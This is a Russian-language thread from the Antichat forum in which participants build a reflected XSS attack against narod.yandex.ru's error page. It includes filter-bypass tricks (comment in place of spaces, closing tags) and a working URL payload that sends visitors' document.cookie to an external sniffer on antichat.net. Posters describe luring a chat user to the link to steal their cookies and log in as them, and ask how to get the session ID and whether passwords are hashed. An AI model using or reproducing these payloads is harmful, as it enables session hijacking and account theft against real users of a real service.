ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Скажите как её можно использовать ?

Ага, а то у меня просто вылезло яндексуид и ещё что-то...Зачем это нужно?

попробуй через осла посмотреть

по ходу дела смысла от неё никакого... хотя если кто чё найдёт суйте сюда

Обработчик обрезает до первого слэша, поэтому от закрывающей "</script>" остается лишь "<".

Ну так чего, я и не думал, что на Народе будут показываться Яндексовские куки! Это ведь огромный простор для снифферства и т.п.!

насчёт слэша тоже не так всё просто, например такая бадья проходит:

http://narod.yandex.ru/100.xhtml?</font><script>location.replace('http://narod.ru')</script><font>

единственное пробелы не обрабатываются:
та же самая вставка картинки <img src=""> не проходит изза пробела, он в конечном случае идёт как %20 и весь код изпахабивается

пробел можешь комментом попробовать заменить: <img/**/src="">

__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•

СПАСИБА!!!!! ВСЁ РАБОТАЕТ!!!!

у меня мысль такая, сидеть в чате на народе, дать челу ссылку на свой "супер мега сайт", когда он заходит на него, через location.replace делается перевод на страницу с xss со снифером, я беру куки, заменяю их, и сижу под его логином... по моему это слишком наивно ...)))) единственное с той страницы берётся всё кроме session_id, как её вытащить?

Кстати, кто-нибудь может внятно ответить, почему IE 6 при вызове document.cookie выдает не все куки для данного домена? Чаще всего отсутствует тот, что содержит информацию о сессии.

Вот вам пример запроса:
http://narod.yandex.ru/100.xhtml?</font><script>img=new/**/Image;img.src="http://antichat.net/s/s.gif?"+document.cookie;</script><font>

Результат - http://antichat.net/s/log.php

а никто не в курсе на народе пассы хешируются вообще? если да то чем? А то никогда там акка не имел.